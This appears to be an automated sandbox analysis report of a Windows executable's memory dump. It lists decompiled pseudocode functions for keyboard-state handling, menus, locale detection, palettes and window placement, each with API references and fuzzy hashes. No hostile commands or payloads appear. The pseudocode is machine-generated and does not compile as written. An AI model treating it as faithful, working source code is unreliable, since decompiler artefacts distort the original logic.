                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor$DesktopWindow$73451770Show
                                                                        • String ID:
                                                                        • API String ID: 3513720257-0
                                                                        • Opcode ID: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction ID: 60a87f57ea885684c14f26adc1ba0dcb8032ffab10c766f9e9c89d1009de8357
                                                                        • Opcode Fuzzy Hash: 0908ce388f1a167bea320882a453395eb452e286a3d3486925d54d05bbf51521
                                                                        • Instruction Fuzzy Hash: 2191AEB42002519FC700DF69D885A46B7E5ABA9318F16D47BE808CB3B2E739FC45CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00459724(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v268;
                                                                        				char _v508;
                                                                        				char _v524;
                                                                        				char _v528;
                                                                        				char _v532;
                                                                        				char _v536;
                                                                        				char _v540;
                                                                        				char _v544;
                                                                        				void* _t75;
                                                                        				intOrPtr _t91;
                                                                        				char* _t97;
                                                                        				signed int _t107;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t121;
                                                                        				intOrPtr _t133;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t146;
                                                                        				int _t152;
                                                                        				intOrPtr _t153;
                                                                        				void* _t163;
                                                                        				void* _t164;
                                                                        				intOrPtr _t165;
                                                                        
                                                                        				_t163 = _t164;
                                                                        				_t165 = _t164 + 0xfffffde4;
                                                                        				_v544 = 0;
                                                                        				_v540 = 0;
                                                                        				_v536 = 0;
                                                                        				_v532 = 0;
                                                                        				_v528 = 0;
                                                                        				_t133 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t163);
                                                                        				_push(0x459984);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t165;
                                                                        				if(__edx >= 1) {
                                                                        					E004591EC(_v8,  &_v528);
                                                                        					if(E0040A9F8(_v528, _t133) == 1) {
                                                                        						_t133 = _t133 - 1;
                                                                        					}
                                                                        				}
                                                                        				_v12 = _t133;
                                                                        				if(E00459504(_v8) == 0) {
                                                                        					__eflags = _v12;
                                                                        					if(_v12 < 0) {
                                                                        						__eflags = 0;
                                                                        						_v12 = 0;
                                                                        					}
                                                                        					E004591EC(_v8,  &_v540);
                                                                        					_t75 = E00404600(_v540);
                                                                        					__eflags = _t75 - _v12;
                                                                        					if(_t75 <= _v12) {
                                                                        						E004591EC(_v8,  &_v544);
                                                                        						_v12 = E00404600(_v544);
                                                                        					}
                                                                        					E00459700(_v8, _v12, _v12);
                                                                        					goto L21;
                                                                        				} else {
                                                                        					if(_v12 < 0) {
                                                                        						_v12 = 0;
                                                                        					}
                                                                        					_t135 = _v12 + 1;
                                                                        					E004591EC(_v8,  &_v532);
                                                                        					if(_t135 < E00404600(_v532)) {
                                                                        						E004591EC(_v8,  &_v536);
                                                                        						asm("bt [edx], eax");
                                                                        						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
                                                                        							_t135 = _t135 + 1;
                                                                        						}
                                                                        					}
                                                                        					_t24 = _v8 + 0x228; // 0xba6855c0
                                                                        					_t91 =  *_t24;
                                                                        					if(_t91 <= _v12) {
                                                                        						_v12 = _t91;
                                                                        						_t135 = _v12;
                                                                        					}
                                                                        					E00459700(_v8, _t135, _t135);
                                                                        					if(_t135 == _v12) {
                                                                        						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
                                                                        						L21:
                                                                        						__eflags = 0;
                                                                        						_pop(_t146);
                                                                        						 *[fs:eax] = _t146;
                                                                        						_push(0x45998b);
                                                                        						return E0040436C( &_v544, 5);
                                                                        					} else {
                                                                        						GetKeyboardState( &_v268);
                                                                        						_t152 = 0x100;
                                                                        						_t97 =  &_v524;
                                                                        						do {
                                                                        							 *_t97 = 0;
                                                                        							_t97 = _t97 + 1;
                                                                        							_t152 = _t152 - 1;
                                                                        							_t177 = _t152;
                                                                        						} while (_t152 != 0);
                                                                        						_v508 = 0x81;
                                                                        						 *((char*)(_t163 + ( *(0x47ac20 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
                                                                        						SetKeyboardState( &_v524);
                                                                        						 *((char*)(_v8 + 0x23c)) = 1;
                                                                        						_push(_t163);
                                                                        						_push(0x4598f2);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t165;
                                                                        						_t107 = E004037D8(_v8, _t177);
                                                                        						SendMessageA(E0043CC2C(_v8), 0x100,  *(0x47ac20 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                        						_t114 = E004037D8(_v8, _t177);
                                                                        						SendMessageA(E0043CC2C(_v8), 0x101,  *(0x47ac20 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                        						_pop(_t153);
                                                                        						 *[fs:eax] = _t153;
                                                                        						_push(0x4598f9);
                                                                        						_t121 = _v8;
                                                                        						 *((char*)(_t121 + 0x23c)) = 0;
                                                                        						return _t121;
                                                                        					}
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,00459984), ref: 0045981F
                                                                        • SetKeyboardState.USER32(00000081), ref: 00459863
                                                                        • SendMessageA.USER32 ref: 004598A8
                                                                        • SendMessageA.USER32 ref: 004598D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: KeyboardMessageSendState
                                                                        • String ID:
                                                                        • API String ID: 1999190242-0
                                                                        • Opcode ID: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction ID: 0a00c29b07d859761f66e24d50c690cbb1c1765d6d02b1fe706050cb4a926a74
                                                                        • Opcode Fuzzy Hash: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction Fuzzy Hash: 07614D74A00618EFDB10EF69C985ADDB7B4EB59304F2045EAE804A7392D7386F84DB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00450AA0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				void* _t41;
                                                                        				void* _t54;
                                                                        				void* _t61;
                                                                        				struct HMENU__* _t64;
                                                                        				struct HMENU__* _t70;
                                                                        				intOrPtr _t77;
                                                                        				void* _t79;
                                                                        				intOrPtr _t81;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t87;
                                                                        				void* _t92;
                                                                        				intOrPtr _t98;
                                                                        				void* _t111;
                                                                        				intOrPtr _t113;
                                                                        				void* _t116;
                                                                        
                                                                        				_t109 = __edi;
                                                                        				_push(__edi);
                                                                        				_v20 = 0;
                                                                        				_t113 = __edx;
                                                                        				_t92 = __eax;
                                                                        				_push(_t116);
                                                                        				_push(0x450c66);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                        				if(__edx == 0) {
                                                                        					L7:
                                                                        					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                        					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                        						E00449D44(_t39, 0, _t109, 0);
                                                                        					}
                                                                        					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                        						_t113 = 0;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                        					if(_t113 != 0) {
                                                                        						E0041C2AC(_t113, _t92);
                                                                        					}
                                                                        					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                        						_t41 = E0043CF30(_t92);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 != 0) {
                                                                        							SetMenu(E0043CC2C(_t92), 0);
                                                                        						}
                                                                        						goto L30;
                                                                        					} else {
                                                                        						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                        							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                        								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                        								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                        									_t54 = E0043CF30(_t92);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										SetMenu(E0043CC2C(_t92), 0);
                                                                        									}
                                                                        								}
                                                                        								goto L30;
                                                                        							}
                                                                        							goto L21;
                                                                        						} else {
                                                                        							L21:
                                                                        							if(E0043CF30(_t92) != 0) {
                                                                        								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                        								_t110 = _t61;
                                                                        								_t64 = GetMenu(E0043CC2C(_t92));
                                                                        								_t138 = _t61 - _t64;
                                                                        								if(_t61 != _t64) {
                                                                        									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                        									SetMenu(E0043CC2C(_t92), _t70);
                                                                        								}
                                                                        								E00449D44(_t113, E0043CC2C(_t92), _t110, _t138);
                                                                        							}
                                                                        							L30:
                                                                        							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                        								E00451B60(_t92, 1);
                                                                        							}
                                                                        							E004509D8(_t92);
                                                                        							_pop(_t98);
                                                                        							 *[fs:eax] = _t98;
                                                                        							_push(0x450c6d);
                                                                        							return E00404348( &_v20);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t77 =  *0x496c08; // 0x217094c
                                                                        				_t79 = E00454224(_t77) - 1;
                                                                        				if(_t79 >= 0) {
                                                                        					_v8 = _t79 + 1;
                                                                        					_t111 = 0;
                                                                        					do {
                                                                        						_t81 =  *0x496c08; // 0x217094c
                                                                        						if(_t113 ==  *((intOrPtr*)(E00454210(_t81, _t111) + 0x248))) {
                                                                        							_t83 =  *0x496c08; // 0x217094c
                                                                        							if(_t92 != E00454210(_t83, _t111)) {
                                                                        								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                        								_v12 = 0xb;
                                                                        								_t87 =  *0x495938; // 0x41d7a4
                                                                        								E00406548(_t87,  &_v20);
                                                                        								E0040A1B8(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                        								E00403DA8();
                                                                        							}
                                                                        						}
                                                                        						_t111 = _t111 + 1;
                                                                        						_t10 =  &_v8;
                                                                        						 *_t10 = _v8 - 1;
                                                                        					} while ( *_t10 != 0);
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • GetMenu.USER32(00000000), ref: 00450BC4
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450BE1
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450C16
                                                                        • SetMenu.USER32(00000000,00000000,00000000,00450C66), ref: 00450C32
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$LoadString
                                                                        • String ID:
                                                                        • API String ID: 3688185913-0
                                                                        • Opcode ID: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction ID: 93c5ed83d1bbe9563ebe99875d81bd0e706f4a4ab4f057bf17101cf897a6ad90
                                                                        • Opcode Fuzzy Hash: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction Fuzzy Hash: 3751DD34A002449BDB25AFBA89C579E77959F05309F0415BBBC44AB397CA3CEC89C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040AE3C() {
                                                                        				char _v152;
                                                                        				short _v410;
                                                                        				signed short _t14;
                                                                        				signed int _t16;
                                                                        				int _t18;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				int _t26;
                                                                        				signed int _t30;
                                                                        				signed int _t31;
                                                                        				signed int _t32;
                                                                        				signed int _t37;
                                                                        				int* _t39;
                                                                        				short* _t41;
                                                                        				void* _t49;
                                                                        
                                                                        				 *0x4967f0 = 0x409;
                                                                        				 *0x4967f4 = 9;
                                                                        				 *0x4967f8 = 1;
                                                                        				_t14 = GetThreadLocale();
                                                                        				if(_t14 != 0) {
                                                                        					 *0x4967f0 = _t14;
                                                                        				}
                                                                        				if(_t14 != 0) {
                                                                        					 *0x4967f4 = _t14 & 0x3ff;
                                                                        					 *0x4967f8 = (_t14 & 0x0000ffff) >> 0xa;
                                                                        				}
                                                                        				memcpy(0x47a0c0, 0x40af90, 8 << 2);
                                                                        				if( *0x47a0ac != 2) {
                                                                        					_t16 = GetSystemMetrics(0x4a);
                                                                        					__eflags = _t16;
                                                                        					 *0x4967fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                        					_t18 = GetSystemMetrics(0x2a);
                                                                        					__eflags = _t18;
                                                                        					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                        					 *0x4967fc = _t31;
                                                                        					__eflags = _t31;
                                                                        					if(__eflags != 0) {
                                                                        						return E0040ADC4(__eflags, _t49);
                                                                        					}
                                                                        				} else {
                                                                        					_t20 = E0040AE24();
                                                                        					if(_t20 != 0) {
                                                                        						 *0x4967fd = 0;
                                                                        						 *0x4967fc = 0;
                                                                        						return _t20;
                                                                        					}
                                                                        					E0040ADC4(__eflags, _t49);
                                                                        					_t37 = 0x20;
                                                                        					_t23 = E00403120(0x47a0c0, 0x20, 0x40af90);
                                                                        					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                        					 *0x4967fc = _t32;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0x4967fd = 0;
                                                                        						return _t23;
                                                                        					}
                                                                        					_t24 = 0x80;
                                                                        					_t39 =  &_v152;
                                                                        					do {
                                                                        						 *_t39 = _t24;
                                                                        						_t24 = _t24 + 1;
                                                                        						_t39 =  &(_t39[0]);
                                                                        						__eflags = _t24 - 0x100;
                                                                        					} while (_t24 != 0x100);
                                                                        					_t26 =  *0x4967f0; // 0x409
                                                                        					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                        					_t18 = 0x80;
                                                                        					_t41 =  &_v410;
                                                                        					while(1) {
                                                                        						__eflags =  *_t41 - 2;
                                                                        						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                        						 *0x4967fd = _t37;
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_t41 = _t41 + 2;
                                                                        						_t18 = _t18 - 1;
                                                                        						__eflags = _t18;
                                                                        						if(_t18 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							return _t18;
                                                                        						}
                                                                        						L18:
                                                                        					}
                                                                        				}
                                                                        				L17:
                                                                        				return _t18;
                                                                        				goto L18;
                                                                        			}


                                                                        APIs
                                                                        • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF30
                                                                        • GetThreadLocale.KERNEL32 ref: 0040AE66
                                                                          • Part of subcall function 0040ADC4: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: InfoLocaleStringThreadType
                                                                        • String ID:
                                                                        • API String ID: 1505017576-0
                                                                        • Opcode ID: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction ID: 6a4de5057cbed62019ff6cd1b2bb6358f707544f7e948a3695c44cd18fd2b04b
                                                                        • Opcode Fuzzy Hash: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction Fuzzy Hash: B731F6A16803839AD710DB65AC01FA63794EB6134CF1580FBE984AB3D2DB3D4865C76F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00423738(intOrPtr __eax, void* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t33;
                                                                        				intOrPtr _t59;
                                                                        				struct HDC__* _t69;
                                                                        				void* _t70;
                                                                        				intOrPtr _t79;
                                                                        				void* _t84;
                                                                        				struct HPALETTE__* _t85;
                                                                        				intOrPtr _t87;
                                                                        				intOrPtr _t89;
                                                                        
                                                                        				_t87 = _t89;
                                                                        				_push(_t70);
                                                                        				_v8 = __eax;
                                                                        				_t33 = _v8;
                                                                        				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                        					return _t33;
                                                                        				} else {
                                                                        					E00420398(_v8);
                                                                        					_push(_t87);
                                                                        					_push(0x423817);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t89;
                                                                        					E00424A54( *((intOrPtr*)(_v8 + 0x58)));
                                                                        					E004235B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                        					E00424C34( *((intOrPtr*)(_v8 + 0x58)));
                                                                        					_t69 = CreateCompatibleDC(0);
                                                                        					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                        					if(_t84 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                                                                        					}
                                                                        					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                                                                        					if(_t85 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                                                                        						RealizePalette(_t69);
                                                                        					}
                                                                        					E004207B0(_v8, _t69);
                                                                        					_t59 =  *0x47a788; // 0x21706f4
                                                                        					E00414814(_t59, _t69, _t70, _v8, _t85);
                                                                        					_pop(_t79);
                                                                        					 *[fs:eax] = _t79;
                                                                        					_push(0x42381e);
                                                                        					return E00420604(_v8);
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042378D
                                                                        • SelectObject.GDI32(00000000,?), ref: 004237A6
                                                                        • SelectPalette.GDI32(00000000,?,000000FF), ref: 004237CF
                                                                        • RealizePalette.GDI32(00000000), ref: 004237DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                        • String ID:
                                                                        • API String ID: 979337279-0
                                                                        • Opcode ID: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction ID: c88b5c0543f23b78fd250c8d9274629173d69d4b00430ff76432291ce0c063de
                                                                        • Opcode Fuzzy Hash: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction Fuzzy Hash: E0310874B04654EFDB04EF5AD981D4DB3F5EF48714B6281A6F804AB362C738EE80DA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0044A130(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ecx;
                                                                        				void* __edi;
                                                                        				int _t27;
                                                                        				void* _t40;
                                                                        				int _t41;
                                                                        				int _t50;
                                                                        
                                                                        				_t50 = _t41;
                                                                        				_t49 = __edx;
                                                                        				_t40 = __eax;
                                                                        				if(E0044983C(__eax) == 0) {
                                                                        					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                        					_t27 = GetMenuItemID(_t49, _t50);
                                                                        					_t51 = _t27;
                                                                        					if(_t27 != 0xffffffff) {
                                                                        						_v8 = E004496B8(_t40, 0, _t51);
                                                                        					}
                                                                        				} else {
                                                                        					_t49 = GetSubMenu(_t49, _t50);
                                                                        					_v8 = E004496B8(_t40, 1, _t37);
                                                                        				}
                                                                        				if(_v8 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					 *_a12 = 0;
                                                                        					E00408CB4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                        					return E00408BF8(_a12, _t49);
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$ItemStateString
                                                                        • String ID:
                                                                        • API String ID: 306270399-0
                                                                        • Opcode ID: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction ID: a086aaca1138dc505a42b3517b193e50cf2349fe978f08e3be5af1dc0d792112
                                                                        • Opcode Fuzzy Hash: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction Fuzzy Hash: 64117F31602214AFDB00EF2D8C81AAF77E89F4A364F10446AF819E7382D6389D11D769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045BF2C(intOrPtr* __eax, int __ecx, RECT* __edx) {
                                                                        				int _t9;
                                                                        				int _t12;
                                                                        				int _t26;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				intOrPtr* _t43;
                                                                        				int* _t44;
                                                                        
                                                                        				_t37 = __ecx;
                                                                        				_t44 = __edx;
                                                                        				_t43 = __eax;
                                                                        				_t9 = IsRectEmpty(__edx);
                                                                        				_t47 = _t9;
                                                                        				if(_t9 != 0) {
                                                                        					return E0045BEC4(_t43, _t47);
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t43 + 0x94))();
                                                                        				__eflags = _t37;
                                                                        				if(_t37 != 0) {
                                                                        					L5:
                                                                        					_t12 = 1;
                                                                        				} else {
                                                                        					_t34 = IsWindowVisible(E0043CC2C(_t43));
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						_t12 = 0;
                                                                        					}
                                                                        				}
                                                                        				E0045BE40(_t43);
                                                                        				SetWindowPos(E0043CC2C(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
                                                                        				 *((intOrPtr*)( *_t43 + 0xf8))();
                                                                        				__eflags = _t12;
                                                                        				if(__eflags != 0) {
                                                                        					E0045BE40(_t43);
                                                                        				}
                                                                        				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
                                                                        				__eflags = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					return SetFocus(E0043CC2C(_t43));
                                                                        				}
                                                                        				return _t26;
                                                                        			}











                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 0045BF37
                                                                        • IsWindowVisible.USER32(00000000), ref: 0045BF62
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BF9A
                                                                        • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BFCF
                                                                          • Part of subcall function 0045BEC4: IsWindowVisible.USER32(00000000), ref: 0045BEDB
                                                                          • Part of subcall function 0045BEC4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF02
                                                                          • Part of subcall function 0045BEC4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$FocusVisible$EmptyRect
                                                                        • String ID:
                                                                        • API String ID: 698668684-0
